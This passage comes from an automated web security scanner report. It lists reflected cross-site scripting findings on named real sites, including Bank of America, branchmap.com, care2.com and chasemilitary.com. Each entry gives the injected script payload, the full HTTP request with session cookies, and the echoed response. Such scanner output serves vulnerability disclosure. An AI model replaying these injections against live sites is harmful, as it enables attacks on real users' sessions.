Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:44 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/helpec464"><script>alert(1)</script>899a7c53100/index.cfm">
...[SNIP]...

2.81. http://www.bankofamerica.com/loansandhomes/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /loansandhomes/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e1"><script>alert(1)</script>5ff4d40fe3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfm?template=lc_mortgage HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:59 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfmtemplate=lc_mortgage">
...[SNIP]...

2.82. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864f9"><script>alert(1)</script>190e5f7b296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:00 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm">
...[SNIP]...

2.83. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /pap/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c92"><script>alert(1)</script>201cd186128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pap88c92"><script>alert(1)</script>201cd186128/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:13 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/pap88c92"><script>alert(1)</script>201cd186128/index.cfm">
...[SNIP]...

2.84. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /studentbanking/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede62"><script>alert(1)</script>778b0ce2212 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:58 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=866563755.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm">
...[SNIP]...

2.85. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /vehicle_and_personal_loans/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ce"><script>alert(1)</script>45ae18a6011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:20 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm">
...[SNIP]...

2.86. http://www.branchmap.com/mapserver.php [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a923</script><script>alert(1)</script>09ca345e6cd was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=9&zoom=12&zip=&client=navy&city=9a923</script><script>alert(1)</script>09ca345e6cd HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:06:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='9';
var myaddress='';
var mystate='';
var mycity='9a923</script><script>alert(1)</script>09ca345e6cd';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(12
...[SNIP]...

2.87. http://www.branchmap.com/mapserver.php [dist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the dist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6fe</script><script>alert(1)</script>c091167078b was submitted in the dist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=96a6fe</script><script>alert(1)</script>c091167078b&zoom=12&zip=&client=navy&city= HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='96a6fe</script><script>alert(1)</script>c091167078b';
var myaddress='';
var mystate='';
var mycity='';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(
...[SNIP]...

2.88. http://www.branchmap.com/mapserver.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a84</script><script>alert(1)</script>6bbb498c306 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?client=navy&zip=17a84</script><script>alert(1)</script>6bbb498c306 HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='3';
var myaddress='';
var mystate='';
var mycity='';
var myzip='17a84</script><script>alert(1)</script>6bbb498c306';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(8);
var maptype
...[SNIP]...

2.89. http://www.branchmap.com/mapserver.php [zoom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ceaa%3balert(1)//c7cc7a9b7c8 was submitted in the zoom parameter. This input was echoed as 2ceaa;alert(1)//c7cc7a9b7c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=9&zoom=122ceaa%3balert(1)//c7cc7a9b7c8&zip=&client=navy&city= HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script t
...[SNIP]...
';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(122ceaa;alert(1)//c7cc7a9b7c8);
var maptype = '';
var mapwidth= '552';
var mapheight= '500';
var zoomfirst = '';
var myversion = 'v53';
var dedupeList = 'navy';
var drivingDir = '';
var noOriginPoint = '';
var disclaimer = '';
var
...[SNIP]...

2.90. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c432</script><script>alert(1)</script>593046afd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 01:07:40 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=4a49c31771737435e71c497a27a4ef68%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=580b27568625e1c9c22011d9bba42f4c%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:07:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:41 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 76015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="Care2 : Green Living : Channel : Bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78"
s.server="www.care2.com"
s.channel="Greenliving"
s.pageType=""
s.prop3="Greenliving"
s.prop16="Unregistered"
s.prop22="GL Channel : bluefin-tuna-sells-for-396000.html4c432</script>
...[SNIP]...

2.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3605</script><script>alert(1)</script>a13efd1020b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:20 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=9f2472a448b873474901c8c8211d15c4%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=e5dde59e923be04df3ab69c16d9aa184%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:21 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144725

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<script type="text/javascript">

function loadCommentPage(page, numPerPage, itemID)
{
var sPath = '/greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1';
var charForQueryString = (sPath.indexOf("?") != -1) ? "&" : "?";
var servlet = charForQueryString + 'Care2CommentPageAJAX=1&page='+page+'&commentsPerPage='+numPerPage+'&itemID='+itemID;

...[SNIP]...

2.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9beb"><script>alert(1)</script>7188eebfdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9beb\"><script>alert(1)</script>7188eebfdad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?f9beb"><script>alert(1)</script>7188eebfdad=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:50 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=0e4516f4eaebfc055e9af2d16a87a343%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=b3342346d15f1b20be2442ecb6ff0483%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:51 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html?f9beb\"><script>alert(1)</script>7188eebfdad=1#comment_form" />
...[SNIP]...

2.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fbf</script><script>alert(1)</script>5ef21547687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:06 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=76875f7136cd6b6fa77b12431af6f845%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=a29576ec1e14546db9a5710320918bfb%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:06 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144724

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
-1555312', 'mouseover', function(){memberRollover.mem(this);;});
new CARE2.prime.PillManager('d9a3e6ff-1');
function onFacebookConnect() {
var pg = "/greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1" + "#comment_form";
C2FBConnect.onConnect(pg);
}
FB.init("dfc27a7e48d90111634fd0bbe8eb73d7", "/fb/xd_receiver.htm");
if($('newCommentForm')) {

var theForm = $('newCommentForm').getElementsB
...[SNIP]...

2.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8517f"%3balert(1)//55b2694a95c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8517f";alert(1)//55b2694a95c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8517f"%3balert(1)//55b2694a95c=1 HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=OVMPLYS727Bec7OCKKLW; path=/
Cache-Control: private
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=rehnjh55ru5bdbjfzqdu5vzl; path=/; HttpOnly
Date: Wed, 02 Feb 2011 22:16:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
'false',
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%268517F";ALERT(1)//55B2694A95C=1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes
...[SNIP]...

2.95. http://www.chasemilitary.com/Default.aspx [ada parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /Default.aspx

Issue detail

The value of the ada request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab183"%3balert(1)//884aa7f60f1 was submitted in the ada parameter. This input was echoed as ab183";alert(1)//884aa7f60f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Default.aspx?ada=trueab183"%3balert(1)//884aa7f60f1 HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68621
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 01:06:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
,
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%26ADA=trueab183";alert(1)//884aa7f60f1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes);
...[SNIP]...

2.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /Default.aspx

Issue detail

